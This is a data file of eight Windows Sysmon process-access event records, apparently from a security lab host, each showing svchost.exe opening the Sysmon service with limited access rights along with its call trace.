{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.255\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.255","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
